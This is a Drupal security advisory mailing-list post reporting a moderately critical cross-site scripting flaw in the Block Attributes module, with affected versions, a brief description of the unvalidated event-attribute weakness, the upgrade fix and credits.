[Security-news] Block Attributes - Moderately critical - Cross-site Scripting - SA-CONTRIB-2025-090
security-news at drupal.org
security-news at drupal.org
Wed Jul 16 16:46:27 UTC 2025
View online: https://www.drupal.org/sa-contrib-2025-090
Project: Block Attributes [1]
Date: 2025-July-16
Security risk: *Moderately critical* 14 ∕ 25
AC:Basic/A:User/CI:Some/II:Some/E:Theoretical/TD:All [2]
Vulnerability: Cross-site Scripting
Affected versions: <1.1.0 || >=2.0.0 <2.0.1
CVE IDs: CVE-2025-7715
Description:
This module allows you to define custom attributes for a block. You can
specify an attribute name to be added to the block in a predefined format.
The module does not sufficiently validate the provided attributes, which
makes it possible to insert JavaScript event attributes such as onmouseover,
onkeyup, etc. These attributes can execute JavaScript code when the page is
rendered, leading to cross-site scripting (XSS) vulnerabilities.
This vulnerability is partially mitigated by the requirement to manually add
the specific attributes and corresponding JavaScript code to the form after
the attribute has been created.
Solution:
Install the latest version:
* If you use the Block Attributes module for Drupal, upgrade to Block
Attributes 8.x-1.1 [3] or Block Attributes 2.0.1 [4].
Reported By:
* Pierre Rudloff (prudloff) [5] provisional member of the Drupal Security
Team
Fixed By:
* Kostia Bohach (_shy) [6]
Coordinated By:
* Greg Knaddison (greggles) [7] of the Drupal Security Team
* Juraj Nemec (poker10) [8] of the Drupal Security Team
* Pierre Rudloff (prudloff), provisional member of the Drupal Security Team
[9]
* Jess (xjm) [10] of the Drupal Security Team
[1] https://www.drupal.org/project/block_attributes
[2] https://www.drupal.org/security-team/risk-levels
[3] https://www.drupal.org/project/block_attributes/releases/8.x-1.1
[4] https://www.drupal.org/project/block_attributes/releases/2.0.1
[5] https://www.drupal.org/u/prudloff
[6] https://www.drupal.org/u/_shy
[7] https://www.drupal.org/u/greggles
[8] https://www.drupal.org/u/poker10
[9] https://www.drupal.org/u/prudloff
[10] https://www.drupal.org/u/xjm
More information about the Security-news
mailing list